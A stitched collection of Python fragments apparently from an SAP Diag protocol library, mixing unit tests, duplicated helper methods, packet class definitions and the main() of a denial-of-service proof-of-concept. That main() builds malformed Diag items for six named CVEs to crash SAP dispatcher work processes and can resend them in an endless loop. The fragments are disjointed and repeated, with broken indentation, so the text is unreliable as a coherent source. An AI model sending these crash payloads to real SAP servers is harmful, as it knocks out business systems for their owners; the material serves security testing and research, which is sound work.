    def test_sapdiag_items_lookup(self):
        """Test lookup and filtering of SAPDiagItems inside a SAPDiag
        packet.

        Items are located by type, id and sid, each given either as the
        numeric value, its string name, or a list of either.  A trailing
        payload that is not a valid item must not break the lookup.
        """
        packet = SAPDiag()

        ses_item = SAPDiagItem(item_type="SES")
        packet.message.append(ses_item)

        appl_item = SAPDiagItem(item_type="APPL", item_id="ST_USER",
                                item_sid="RFC_PARENT_UUID")
        packet.message.append(appl_item)

        # SES item: found by numeric or string type, not by another type
        for lookup in ((0x1,), ("SES",)):
            self.assertIn(ses_item, packet.get_item(*lookup))
        for lookup in ((0x10,), ("APPL",)):
            self.assertNotIn(ses_item, packet.get_item(*lookup))

        # APPL item: type, id and sid may each be numeric or a string name
        for lookup in ((0x10,),
                       ("APPL",),
                       ("APPL", 0x04),
                       ("APPL", "ST_USER"),
                       ("APPL", 0x04, 0x10),
                       ("APPL", "ST_USER", 0x10),
                       ("APPL", "ST_USER", "RFC_PARENT_UUID")):
            self.assertIn(appl_item, packet.get_item(*lookup))
        for lookup in ((0x1,),
                       ("APPL4",),
                       ("APPL", 0x06),
                       ("APPL", "ST_R3INFO"),
                       ("APPL", 0x04, 0x02),
                       ("APPL", "ST_USER", 0x02),
                       ("APPL", "ST_USER", "CONNECT")):
            self.assertNotIn(appl_item, packet.get_item(*lookup))

        # Lists match any of the given values; a list of types returns every
        # matching item in packet order
        self.assertListEqual([ses_item, appl_item], packet.get_item([0x01, 0x10]))
        self.assertListEqual([ses_item, appl_item], packet.get_item(["SES", "APPL"]))
        for lookup in ((["APPL"], [0x04, 0x06]),
                       (["APPL"], ["ST_USER", "ST_R3INFO"]),
                       (["APPL"], 0x04, [0x02, 0x10]),
                       (["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"])):
            self.assertIn(appl_item, packet.get_item(*lookup))
        for lookup in ((["SES", "APPL4"],),
                       (["APPL"], ["ST_R3INFO"]),
                       (["APPL"], ["ST_USER"], ["CONNECT"])):
            self.assertNotIn(appl_item, packet.get_item(*lookup))

        # A trailing payload that is not an item must not break the lookup
        packet.message.append(Raw("\x00" * 10))
        self.assertIn(ses_item, packet.get_item("SES"))
        self.assertIn(appl_item, packet.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))
    def test_sapdiag_header_dissection_compressed(self):
        """Test SAPDiag headers dissection with compression.

        A packet built with ``compress=1`` and re-parsed from its own bytes
        must carry the same first message item as the original.
        """
        item = SAPDiagItem(item_value="TEST_COMPRESSED")
        original = SAPDiag(compress=1)
        original.message.append(item)

        rebuilt = SAPDiag(str(original))
        self.assertEqual(str(original.message[0]), str(rebuilt.message[0]))
    def test_sapdiag_header_dissection_plain(self):
        """Test SAPDiag headers dissection without compression.

        A packet built with ``compress=0`` and re-parsed from its own bytes
        must serialize back to the identical byte string.
        """
        item = SAPDiagItem(item_value="TEST_PLAIN")
        original = SAPDiag(compress=0)
        original.message.append(item)

        rebuilt = SAPDiag(str(original))
        self.assertEqual(str(original), str(rebuilt))
    def interact(self, message):
        """Interacts with the SAP Diag server, adding the :class:`SAPDiagStep` item and
        ending with a 'end of message' item.

        The step counter is incremented before the step item is built, and
        *message* is modified in place (step item prepended, EOM appended).
        Nothing is sent and ``None`` is returned when the connection is not
        initialized.

        :param message: items to send
        :type message: ``list`` of :class:`SAPDiagItem`

        :return: server's response, or ``None`` if not initialized
        :rtype: :class:`SAPNI<SAPNI.SAPNI>`
        """
        if not self.initialized:
            return None

        self.step = self.step + 1
        step_item = SAPDiagItem(item_type="APPL", item_id="ST_USER",
                                item_sid=0x26,
                                item_value=SAPDiagStep(step=self.step))
        message[:0] = [step_item]
        message.append(SAPDiagItem(item_type="EOM"))
        return self.sr_message(message)
    def interact(self, message):
        """Interacts with the SAP Diag server, adding the L{SAPDiagStep} item and
        ending with a 'end of message' item.

        The step counter is incremented first, a step item carrying the new
        value is inserted at the front of C{message} and an EOM item is
        appended, so the caller's list is modified in place.  Returns C{None}
        without sending anything when the connection is not initialized.

        @param message: items to send
        @type message: C{list} of L{SAPDiagItem}

        @return: server's response, or C{None} if not initialized
        @rtype: L{SAPNI<SAPNI.SAPNI>}
        """
        if not self.initialized:
            return None

        self.step += 1
        message.insert(0, SAPDiagItem(item_type="APPL",
                                      item_id="ST_USER",
                                      item_sid=0x26,
                                      item_value=SAPDiagStep(step=self.step)))
        message.append(SAPDiagItem(item_type="EOM"))
        return self.sr_message(message)
    def get_support_data_item(self, support_data):
        """Normalizes the given support data into a :class:`SAPDiagItem`.

        Accepts a string (passed through ``unhex`` and wrapped into
        :class:`SAPDiagSupportBits`), a :class:`SAPDiagSupportBits` instance
        (wrapped into an ``APPL`` / ``ST_USER`` / ``SUPPORTDATA`` item), or an
        already built :class:`SAPDiagItem`, which is returned unchanged.

        :param support_data: support bits as string, SAPDiagSupportBits or SAPDiagItem
        :return: the SAPDiagItem carrying the support data, or ``None`` when
            *support_data* is of none of the accepted types
        """
        if isinstance(support_data, SAPDiagItem):
            return support_data

        bits = support_data
        if isinstance(bits, str):
            bits = SAPDiagSupportBits(unhex(bits))
        if not isinstance(bits, SAPDiagSupportBits):
            return None

        return SAPDiagItem(item_type="APPL", item_id="ST_USER",
                           item_sid="SUPPORTDATA", item_value=bits)
def main():
    """Entry point: builds the Diag item for the selected CVE and sends it.

    Options come from ``parse_options()``; ``options.verbose`` enables DEBUG
    logging and per-round progress output.  An unknown ``options.cve`` value
    prints an error and returns without sending anything.  With
    ``options.loop`` set the item is re-sent every ``options.delay`` seconds
    until the user interrupts with Ctrl-C; otherwise a single round is sent.
    """
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Testing Dispatcher DoS vulnerabilities on host %s:%d" % (options.remote_host,
                                                                        options.remote_port))

    # Crafting the item according to the CVE selected
    if options.cve == 1:
        print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a DataStream (Diag XML Blob) "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="DIAG_XMLBLOB", item_length=0xFFFFFFFF, item_value="Crash!")
    elif options.cve == 2:
        print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a variable ST_USER ST_USER_PASSPORT_DATA item "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL4", item_id="ST_USER", item_sid=0x18, item_length=0xFFFFFFFF,
                           item_value="Crash!")
    elif options.cve == 3:
        print("[*] Crash in DiagTraceAtoms (CVE-2012-2511) using a DYNT ATOM item "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL4", item_id="DYNT", item_sid=0x02, item_value="\x80" * 8)
    elif options.cve == 4:
        print("[*] Crash in DiagTraceStreamI (CVE-2012-2512) using a RCUI RCUI_CONNECT_DATA item "
              "(requires Dialog Developer Trace enabled at level 2 or 3)")
        item = SAPDiagItem(item_type="APPL", item_id="RCUI", item_sid=0x09, item_length=0xFF,
                           item_value="\x12\x1A\x59\x51")
    elif options.cve == 5:
        print("[*] Crash in diaginput (CVE-2012-2513) using a VARINFO MAINAREA_PIXELSIZE item")
        item = SAPDiagItem(item_type="APPL", item_id="VARINFO", item_sid=0x0e, item_value="A" * 10)
    elif options.cve == 6:
        print("[*] Crash in DiagiEventSource (CVE-2012-2514) using a UI_EVENT UI_EVENT_SOURCE item")
        item = SAPDiagItem(item_type="APPL", item_id="UI_EVENT", item_sid=0x01, item_value="A" * 16)

    else:
        # Every valid branch above binds `item`; bail out here so it is never unbound
        print("[-] Invalid CVE specified!")
        return

    # Each round calls send_crash with the same item; only Ctrl-C ends the loop
    if options.loop:
        try:
            while True:
                if options.verbose:
                    print("[*] Started a new round")
                send_crash(options.remote_host, options.remote_port, item,
                           options.number, options.verbose, options.terminal,
                           options.route_string)
                sleep(options.delay)
        except KeyboardInterrupt:
            print("[*] Cancelled by the user")
    else:
        print("[*] Selected a single round")
        send_crash(options.remote_host, options.remote_port, item,
                   options.number, options.verbose, options.terminal,
                   options.route_string)
        print("[*] Crash sent, take a look at the work processes !")
    def test_sapdiag_items_bind(self):
        """Test binding of SAPDiagItem classes.

        A Packet class bound to the (``APPL``, 0x99, 0xff) item is used to
        dissect the item value when such an item is built from raw bytes, and
        ``diag_item_get_class`` resolves back to that very class.
        """
        class SAPDiagItemTest(Packet):
            fields_desc = [StrField("strfield", None)]
        bind_diagitem(SAPDiagItemTest, "APPL", 0x99, 0xff)

        payload = "strfield"
        expected_value = SAPDiagItemTest(strfield=payload)
        # type byte 0x10, id 0x99, sid 0xff, big-endian length, then the value
        raw_item = "".join(["\x10\x99\xff", pack("!H", len(payload)), payload])
        item = SAPDiagItem(raw_item)

        self.assertEqual(item.item_value, expected_value)
        self.assertEqual(item.item_length, len(payload))
        self.assertEqual(item.item_value.strfield, payload)
        self.assertEqual(str(item.item_value), str(expected_value))
        self.assertIs(diag_item_get_class(item, "APPL", 0x99, 0xff), SAPDiagItemTest)
    def test_sapdiag_header_build(self):
        """Test SAPDiag headers building.

        The serialized message part is the same whatever the compress flag,
        and two packets with equal flag and items serialize identically.
        """
        item = SAPDiagItem(item_value="TEST")

        plain = SAPDiag(compress=0)
        compressed = SAPDiag(compress=1)
        for header in (plain, compressed):
            header.message.append(item)

        self.assertEqual(str(plain.message), str(compressed.message))

        # Once the flag is cleared the whole packets must match byte for byte
        compressed.compress = 0
        self.assertEqual(str(plain), str(compressed))
#                           3000    0x00000bb8 SAP GUI Windows
#
class SAPDiagUserConnect(Packet):
    """SAP Diag User Connect item value.

    Carries the protocol version, code page and workstation type announced by
    the client; bound below via ``bind_diagitem`` to the APPL 0x04 / 0x02 item.
    Field defaults are the ones used when no value is given.
    """
    name = "SAP Diag User Connect"
    fields_desc = [
        IntField("protocol_version", 100200),
        IntField("code_page", 1100),
        # NOTE(review): the table above lists 3000 as "SAP GUI Windows"; the
        # meaning of the default 5001 is not documented here -- confirm
        IntField("ws_type", 5001)
    ]


bind_diagitem(SAPDiagUserConnect, "APPL", 0x04, 0x02)

# Two ready-made user connect items: one with the default field values and
# one announcing protocol version 200.  The only difference between them is
# the protocol_version field.
user_connect_compressed = SAPDiagItem(
    item_type="APPL", item_id="ST_USER", item_sid=0x02,
    item_value=SAPDiagUserConnect(),
)

user_connect_uncompressed = SAPDiagItem(
    item_type="APPL", item_id="ST_USER", item_sid=0x02,
    item_value=SAPDiagUserConnect(protocol_version=200),
)


# Diag Dialog step item
class SAPDiagStep(Packet):
    """SAP Diag Dialog Step item value.

    Holds the dialog step counter as a single integer field (default 0).
    """
    name = "SAP Diag Dialog Step"
    fields_desc = [IntField("step", 0)]

 def test_sapdiag_item(self):
     """Test construction of SAPDiag Items.

     An unknown item type name must be rejected with a ``KeyError``.
     """
     self.assertRaises(KeyError, SAPDiagItem, item_type="LALA")